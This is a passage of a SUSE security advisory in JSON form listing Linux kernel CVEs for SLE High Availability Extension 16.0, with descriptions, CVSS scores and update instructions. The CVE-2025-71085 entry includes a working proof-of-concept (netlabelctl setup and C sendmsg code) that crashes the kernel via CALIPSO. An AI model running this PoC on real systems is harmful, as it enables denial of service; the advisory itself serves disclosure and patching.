"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71083",
"url": "https://www.suse.com/security/cve/CVE-2025-71083"
},
{
"category": "external",
"summary": "SUSE Bug 1256610 for CVE-2025-71083",
"url": "https://bugzilla.suse.com/1256610"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71083"
},
{
"cve": "CVE-2025-71084",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71084"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cm: Fix leaking the multicast GID table reference\n\nIf the CM ID is destroyed while the CM event for multicast creating is\nstill queued the cancel_work_sync() will prevent the work from running\nwhich also prevents destroying the ah_attr. This leaks a refcount and\ntriggers a WARN:\n\n GID entry ref leak for dev syz1 index 2 ref=573\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestroy the ah_attr after canceling the work, it is safe to call this\ntwice.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71084",
"url": "https://www.suse.com/security/cve/CVE-2025-71084"
},
{
"category": "external",
"summary": "SUSE Bug 1256622 for CVE-2025-71084",
"url": "https://bugzilla.suse.com/1256622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "low"
}
],
"title": "CVE-2025-71084"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
},
{
"cve": "CVE-2025-71086",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71086"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: rose: fix invalid array index in rose_kill_by_device()\n\nrose_kill_by_device() collects sockets into a local array[] and then\niterates over them to disconnect sockets bound to a device being brought\ndown.\n\nThe loop mistakenly indexes array[cnt] instead of array[i]. For cnt \u003c\nARRAY_SIZE(array), this reads an uninitialized entry; for cnt ==\nARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to\nan invalid socket pointer dereference and also leaks references taken\nvia sock_hold().\n\nFix the index to use i.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71086",
"url": "https://www.suse.com/security/cve/CVE-2025-71086"
},
{
"category": "external",
"summary": "SUSE Bug 1256625 for CVE-2025-71086",
"url": "https://bugzilla.suse.com/1256625"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71086"
},
{
"cve": "CVE-2025-71087",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71087"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: fix off-by-one issues in iavf_config_rss_reg()\n\nThere are off-by-one bugs when configuring RSS hash key and lookup\ntable, causing out-of-bounds reads to memory [1] and out-of-bounds\nwrites to device registers.\n\nBefore commit 43a3d9ba34c9 (\"i40evf: Allow PF driver to configure RSS\"),\nthe loop upper bounds were:\n i \u003c= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX\nwhich is safe since the value is the last valid index.\n\nThat commit changed the bounds to:\n i \u003c= adapter-\u003erss_{key,lut}_size / 4\nwhere `rss_{key,lut}_size / 4` is the number of dwords, so the last\nvalid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `\u003c=`\naccesses one element past the end.\n\nFix the issues by using `\u003c` instead of `\u003c=`, ensuring we do not exceed\nthe bounds.\n\n[1] KASAN splat about rss_key_size off-by-one\n BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800\n Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63\n\n CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n Workqueue: iavf iavf_watchdog_task\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xb0\n print_report+0x170/0x4f3\n kasan_report+0xe1/0x1a0\n iavf_config_rss+0x619/0x800\n iavf_watchdog_task+0x2be7/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\n Allocated by task 63:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7f/0x90\n __kmalloc_noprof+0x246/0x6f0\n iavf_watchdog_task+0x28fc/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n\n The buggy address belongs to the object at ffff888102c50100\n which belongs to the cache kmalloc-64 of size 64\n The buggy address is located 0 bytes to the right of\n allocated 52-byte region [ffff888102c50100, ffff888102c50134)\n\n The buggy address belongs to the physical page:\n page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50\n flags: 0x200000000000000(node=0|zone=2)\n page_type: f5(slab)\n raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000\n raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n \u003effff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc\n ^\n ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc\n ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71087",
"url": "https://www.suse.com/security/cve/CVE-2025-71087"
},
{
"category": "external",
"summary": "SUSE Bug 1256628 for CVE-2025-71087",
"url": "https://bugzilla.suse.com/1256628"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71087"
},
{
"cve": "CVE-2025-71088",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71088"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fallback earlier on simult connection\n\nSyzkaller reports a simult-connect race leading to inconsistent fallback\nstatus:\n\n WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Modules linked in:\n CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 \u003c0f\u003e 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6\n RSP: 0018:ffffc900006cf338 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf\n RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005\n RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007\n R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900\n R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004\n FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0\n Call Trace:\n \u003cTASK\u003e\n tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197\n tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922\n tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672\n tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918\n ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438\n ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500\n dst_input include/net/dst.h:471 [inline]\n ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311\n __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979\n __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092\n process_backlog+0x442/0x15e0 net/core/dev.c:6444\n __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494\n napi_poll net/core/dev.c:7557 [inline]\n net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684\n handle_softirqs+0x216/0x8e0 kernel/softirq.c:579\n run_ksoftirqd kernel/softirq.c:968 [inline]\n run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960\n smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160\n kthread+0x3c2/0x780 kernel/kthread.c:463\n ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148\n 